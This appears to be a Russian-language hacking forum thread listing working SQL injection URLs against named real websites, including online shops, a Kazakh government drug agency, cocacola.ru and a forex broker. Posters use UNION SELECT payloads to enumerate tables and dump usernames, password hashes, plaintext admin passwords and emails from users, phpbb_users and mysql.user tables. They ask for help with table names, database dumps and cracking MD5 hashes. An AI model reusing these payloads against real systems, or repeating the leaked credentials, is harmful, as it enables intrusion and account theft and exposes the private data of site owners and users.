Code: http://bin.ru/office_location.php?office_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,AES_DECRYPT(AES_ENCRYPT(DATABASE(),%20%200x71),0x71),16,17,18,19/* Помогите подобрать таблицы!!! + еще мс етой инъекцией Code: http://www.metalloprokat.ru/onlinechat/?template=-1+union+select+1,2,3,4,5,6,7,8,9/*
http://web.northshield.org/events/calentry.php?ID=-301+union+select+1,2,concat_ws(0x203a20,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+users/*
Обновил Антибоян до 260 страницы, юзаем http://antiboyansql.narod.ru/sql.txt Спасибо geezer.code и Boccob
Интернет-магазин цифровой и портативной техники. Code: http://www.texnostar.com.ua/a-news/news.php?id=-19456+union+select+1,2,3,4,5,6,7,8,9,10/*&groupid=0 USER: texnosta_texno@localhost DATABASE: texnosta_texno VERSION: 4.1.21-standard-log Тоже инет-магазин. Code: http://te.com.ua/catalog.php?cat=-156878+union+select+1,2,3,4,5,6,7,8/* USER: u_te@localhost DATABASE: te VERSION: 4.1.22-standard Магазин подарков "Luxury Gifts". Code: http://www.l-gifts.ru/view_catalog.php?type_low=-12345+union+select+1,2/* USER: [email protected] DATABASE: vittorio VERSION: 4.0.24-log БЕЛЭКСПОЦЕНТР Белгородская торгово-промышленная палата. Code: http://www.belexpocentr.ru/show.php?id=-12345+union+select+1,2,3,4,5,6,7,table_name,9,10,11,12,13,14,15,16,17,18,19,20,21+from+INFORMATION_SCHEMA.TABLES+limit+0,1/* USER: belexpocentr@localhost DATABASE: www_belexpocentr_ru VERSION: 5.0.42 GiperShop Интернет-магазин Запорожье - Украина. Code: http://mobila.gipershop.net.ua/descript.php?kodmob=-12345+union+select+1,2,3,4,5,6,7,8,9,10,11/* USER: gipersho_guest@localhost DATABASE: gipersho_mob VERSION: 4.1.22-standard Белгрейн. Отделочные и строительные материалы. Code: http://www.belgrein.biz/product.php?product=-12345+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/* USER: belgrein_zvonok@localhost DATABASE: belgrein_belgreinnew VERSION: 4.0.27-standard Национальный центр экспертизы лекарственных средств Республики Казахстан. Code: http://www.dari.kz/index.php?p=news_a&cat_id=&id=-12345+union+select+1,2,3,4,table_name,6,7,8,9,10,11+from+INFORMATION_SCHEMA.TABLES+limit+0,1/* USER: dariadm@localhost DATABASE: dari VERSION: 5.0.27 Национальный Информационный Сервис PULSET. Code: http://www.pulset.ru/a_news.php?id_n=-12345+union+select+1,2,3,4/*&type_n=&act=this USER: [email protected] DATABASE: wwwmediabrokerru VERSION: 4.1.18
[Цензура] Grey: На будующее, таких фраз лучше избегать, этот форум не посвящен политики. ------------------------------------------------------ http://www.siin.ee/bestdesign/?keel=rus&mid=0&include=news_viewer&nid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/* Помогите - подобрать - таблицы!
Ошибка в fоrex Code: __http://www.liteforex.net/litetext.php?liteid=-1+union+select+1,2,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17+from+mysql.user/* Code: __http://www.liteforex.net/litetext.php?liteid=-1+union+select+1,2,3,4,concat(user_id,0x3a,username,0x3a,user_password,0x3a,user_email,0x3a,user_icq),6,7,8,9,10,11,12,13,14,15,16,17+from+phpbb_users+where+user_id=2/*
cocacola.ru Code: http://cocacola.ru/promo/antidacha/story.php?id=1+union+select+1,DATABASE(),3,4,USER(),VERSION(),7,8,9/* таблицы подбирать было лень
Разработка сайтов "С-Дизайн", создание сайтов, хостинг, регистрация доменных имен (CMS разработана ими => ошибка во всех сданых проэктах) Code: _http://sdesign.com.ua/search.html?s=-1+union+select+1,2,3,4,version(),6/* Content.com.ua - интернет журнал для владельцев корпоративных веб-сайтов Code: _http://www.content.com.ua/print?idsource=99999+union+select+1,2,version(),4,5,6,7,8,9,0,1,2/* НАШЕ Радио, найближча станція Code: _http://www.nashe.ua/news2.php?id=2349'+union+select+1,version(),3,4,5,6,7,8,9,0,1,2/* Продажа квартир Киев, аренда офисов Киев, недвижимость Украины, новостройки, агентства недвижимости Code: _http://tv.realtors.com.ua/index.php?channel=2000+union+select+1,version(),3,4+from+users/* Телевізійний проект "Шанс", канал "Інтер" Code: _http://www.shans-ua.com/?Id=1&pg1=1&pg2=1&nId=566+union+select+1,2,3,4,5,6,7,concat(login,char(58),password),9+from+users+limit+0,1/* ========================= ну и на сладкое один из крупнейших инет магазинов Украины. Интернет-магазин бытовой техники, сотовых телефонов, компьютеров и компьютерной техники, Украина - Matrix, Лауреат в номинации "Лучший интернет-магазин" Code: _http://www.matrix.ua/polls/?poll_id=2444+union+select+1,TABLE_NAME,3,4,5+from+INFORMATION_SCHEMA.TABLES+limit+61,1/*
www.wapro.ru сайт www.wapro.ru посвящен WAP-у. PR-4. MySQL-5. chatamobile.user Code: http://www.wapro.ru/melody/loadpoly.php?id=-2+union+select+1,concat(login,char(58),password),3,4,5,6,7,8,9,10+from+chatamobile.user/* mail.users Code: http://www.wapro.ru/melody/loadpoly.php?id=-2+union+select+1,concat(domain,char(58),password),3,4,5,6,7,8,9,10+from+mail.users/* mysql.user Code: http://www.wapro.ru/melody/loadpoly.php?id=-2+union+select+1,concat(User,char(58),Password),3,4,5,6,7,8,9,10+from+mysql.user/* foruma.fora_users Code: http://www.wapro.ru/melody/loadpoly.php?id=-2+union+select+1,concat(user_icq,char(58),user_password),3,4,5,6,7,8,9,10+from+foruma.fora_users/* база давольно неплохая, вот админ PHP: Admin:24ae2f800daf6a117841c5c61be67a67 дальше изучая базу я отобрал довольно красивые аськи(хочу заметить что пароли для входа на форум и могут и не подойти для уинов, но надежда, как говориться, умирает последней(как показывает практика, большенство юзеров используют один, относительно сложный пароль для всего)), надеюсь комуто из вас повезет в расшифровке MD5
Code: http://www.redline61.ru/show_titel.php?name=bardachok&id=-1+union+select+1,2,3,4,concat(database(),char(58),user(),char(58),version()),6/* udb3478:Uwww3478S@localhost:4.0.26 Code: http://www.redline61.ru/show_titel.php?name=bardachok&id=-1+union+select+1,2,3,4,concat(username,char(58),user_password),6+from+phpbb_users+limit+1,1/* Past:fedfd9eb856714f7e503036b451b9305:::8854051 Code: http://www.redline61.ru/show_titel.php?name=bardachok&id=-1+union+select+1,2,3,4,concat(username,char(58),user_password),6+from+phpbb_users+where+username=char(122,117,98,105,108,111)/* zubilo:2011fed5a93acfe8f9014bd5ebb3afed:::vfqrfg Code: http://www.redline61.ru/show_titel.php?name=bardachok&id=-1+union+select+1,2,3,4,concat(username,char(58),user_password),6+from+phpbb_users+where+username=char(69,68,68,89)/* EDDY:67a0f0a3c1b6fbd6c4b4997bce86a5ed:::421680
Таблица users Code: http://cocacola.ru/promo/antidacha/story.php?id=1+union+select+1,2,3,4,5,concat(name,0x3a,password,0x3a,email),7,8,9+from+users+where+id=1/* Правда всего одна запись - админ admin:7b21848ac9af35be0ddb2d6b9fc3851934db8420:[email protected]
Code: http://links.allprikol.ru/links.php?id=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(name,char(58),password),0x78),0x78),3+from+admin/* пассы админов в открытом виде, но админки найти не смог, кто найдет поставлю +5 fishkafix:lorddark13 DtSc:ldoprhhk _______ Code: http://www.trubka.ru/cellular/links_s.php?id=-2+union+select+1,concat(login,char(58),password),3,4+from+admin/*
Code: http://www.fibl.org/english/mail.php?id=-7+union+select+1,VERSION(),3/* Code: http://agtw.abime.net/game.php?id=-7+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13+from+INFORMATION_SCHEMA.TABLES+limit+26,1/* Code: http://www.wap.pfl.com.ua/game.php?id=-12151++union+select+1,2,3,4,5,6,VERSION(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
Резултат смотрим в исходнике Downloads: 11 Added: 01.01.70 (4.0.24-standard-log bytes)" title="Views: 6 Downloads: 11 Added: 01.01.70
sql http://www.tennisnews.com/ PR-5 найдены таблицы partner (email,name,passwd,phone,pid) , subscriber Так же работает читалка ))
www.g-play.ru Подозрение на инъекцию: MSSQL Узнаем версию: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 1) Узнаем юзера: g-play4 Узнаем имя базы: g-play Смотрим таблицы: и т.д. В итоге: T_Countrys_R A_Category A_HardReviews A_Price dtproperties G_Вопросы G_Закачки G_Новости G_Проекты G_Сотрудники G_Ссылки G_ТемыВопросов G_Услуги sysconstraints T_Anketa T_BusinessDopOrel T_BusinessMainOrel T_BusinessTula T_Countrys_I T_Entries_GPLAY T_Forums_GPLAY T_Forums_Users T_PersonalTula T_PrivateOrel T_Rate T_Towns_I T_Towns_R Z_News Z_Texts Z_Uchastok Т_Автор Т_Афоризмы Т_ЖанрИгры Т_Игры Т_Закачки Т_Изготовитель Т_Мнения Т_Новости Т_Описания Т_Процессор Т_Публикатор Т_Разделы Т_Скриншоты Т_Ссылки Т_СсылкиТел Т_ЧитКоды Заинтересовала таблица 'T_Forums_Users'. Смотрим столбцы. и т.д. В итоге: userid UserName UserEMail Location Occupation URL Interests ICQnum Signature ShowEMail Password ActiveUser StorePassword CloseUser Итак, вот что мы имеем (а именно - администратора): Ребят, хочется сдампить базу, помогите. Понимаю, что элементарно, только вот php только хотел начать изучать.. В пм если можно..
nvmu.ru Подозрение на инъекцию: Подбираем кол-во колонок: Version: MySQL 5.1.19-beta User: nvmu@localhost Database: nvmu Вывод только в заголовке, прав на mysql.user не хватает, возможно как-нибудь нормально инъектироваться? PS. Спасибо товарищу из аськи за наводку и заодно, что разбудил меня. =\
